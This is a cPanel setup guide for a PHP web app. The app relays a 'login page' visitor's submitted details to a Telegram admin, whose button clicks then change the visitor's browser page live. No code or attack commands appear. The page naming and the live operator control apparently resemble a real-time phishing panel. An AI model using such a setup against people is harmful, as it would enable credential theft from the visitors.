════════════════════════════════════════════════════════════
COMPLETE SETUP GUIDE (cPanel)
════════════════════════════════════════════════════════════

FILES TO UPLOAD:
  1. index.html       → main browser page
  2. config.js        → browser-side company name/domain config
  3. webhook.php      → Telegram webhook handler
  4. config.php       → PHP bot/channel/domain config
  5. router.php       → only needed for PHP built-in server/container deploys
  6. submit.php       → saves onboarding requests locally
  7. state.php        → browser status polling endpoint
  8. storage.php      → local JSON session storage helpers
  9. telegram.php     → server-side Telegram helper

════════════════════════════════════════════════════════════
STEP 1 — UPLOAD ALL FILES TO CPANEL
════════════════════════════════════════════════════════════

1. Log in to your cPanel (Hostinger/Namecheap etc)
2. Open "File Manager"
3. Go to "public_html" folder
4. Click "Upload" and upload the required files

Your folder should look like this:
  public_html/
  ├── index.html
  ├── config.js
  ├── webhook.php
  ├── config.php
  ├── submit.php
  ├── state.php
  ├── storage.php
  └── telegram.php

Your URLs will be:
  Login page:   https://greyston.com
  Webhook:      https://greyston.com/webhook.php

════════════════════════════════════════════════════════════
STEP 2 — REGISTER WEBHOOK WITH TELEGRAM
════════════════════════════════════════════════════════════

Paste this URL in your browser:

https://api.telegram.org/botYOUR_BOT_TOKEN/setWebhook?url=https://greyston.com/webhook.php

You should see:
{"ok":true,"result":true,"description":"Webhook was set"}

That means it's working! ✅

════════════════════════════════════════════════════════════
STEP 3 — VERIFY WEBHOOK IS SET
════════════════════════════════════════════════════════════

Open this in your browser:

https://api.telegram.org/botYOUR_BOT_TOKEN/getWebhookInfo

You should see your webhook URL and "pending_update_count"

════════════════════════════════════════════════════════════
STEP 4 — CHECK LOCAL SESSION STORAGE
════════════════════════════════════════════════════════════

Firebase is no longer required.

1. The app will create a `sessions/` folder automatically.
2. If your host blocks automatic folder creation, create `sessions/` manually.
3. Make sure PHP has write permission for that folder.

════════════════════════════════════════════════════════════
STEP 5 — TEST EVERYTHING
════════════════════════════════════════════════════════════

✅ TEST 1 — Login Page:
   Visit: https://greyston.com
   → Enter onboarding details → click Submit Request
   → Check Telegram channel for the admin notification
   → Admin clicks a status button → browser status updates

✅ TEST 2 — Webhook:
   After admin clicks a button in Telegram
   → Browser page should change automatically through state.php polling

════════════════════════════════════════════════════════════
HOW IT ALL WORKS
════════════════════════════════════════════════════════════

ONBOARDING SYSTEM:
  1. User opens index.html → enters company onboarding details
  2. submit.php saves the request to local JSON
  3. Admin receives Telegram message with action buttons
  4. Telegram sends callback to webhook.php on your server
  5. webhook.php updates local JSON session state
  6. Browser polls state.php → page updates ✅

════════════════════════════════════════════════════════════
TROUBLESHOOTING
════════════════════════════════════════════════════════════

❌ Webhook not receiving:
   → Make sure your domain has SSL (https://)
   → Telegram requires HTTPS for webhooks
   → Check cPanel error logs under "Errors" section

❌ Status not updating:
   → Make sure PHP can write to the sessions/ folder
   → Make sure webhook URL is set to https://greyston.com/webhook.php

❌ Buttons disappear in Telegram:
   → This is fixed! webhook.php sends NEW messages
   → Original message with buttons stays forever

❌ Login page not loading:
   → Make sure index.html is in public_html (not a subfolder)
   → Check your domain is pointing to cPanel correctly

════════════════════════════════════════════════════════════
YOUR CONFIG VALUES
════════════════════════════════════════════════════════════

Update `config.php` and `config.js` with the values for your deployment.

════════════════════════════════════════════════════════════
QUICK CHECKLIST BEFORE GOING LIVE
════════════════════════════════════════════════════════════

□ index.html uploaded to public_html
□ config.js uploaded to public_html
□ webhook.php uploaded to public_html
□ config.php uploaded to public_html
□ Webhook registered with Telegram (Step 2)
□ sessions/ folder is writable or can be auto-created
□ Main page and webhook tested

════════════════════════════════════════════════════════════
